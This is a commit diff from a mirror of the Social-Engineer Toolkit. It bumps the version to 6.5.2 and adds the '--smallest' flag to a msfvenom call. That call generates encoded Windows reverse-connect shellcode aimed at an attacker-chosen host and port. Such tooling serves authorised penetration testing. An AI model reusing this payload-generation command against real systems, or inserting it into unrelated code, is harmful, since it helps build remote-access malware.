mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 14:56:08 +00:00
added smallest payload
This commit is contained in:
parent
7327f71a69
commit
fcdf56a953
2 changed files with 8 additions and 2 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.2
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* added smallest payload option for msfvenom shellcode creation
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.1
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -233,7 +233,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '6.5.1'
|
||||
define_version = '6.5.2'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
@ -1285,7 +1285,7 @@ def generate_shellcode(payload,ipaddr,port):
|
|||
msf_path = meta_path()
|
||||
# generate payload
|
||||
port = port.replace("LPORT=", "")
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows -f c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
|
||||
data = proc.communicate()[0]
|
||||
# start to format this a bit to get it ready
|
||||
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
|
||||
|
|
Loading…
Add table
Reference in a new issue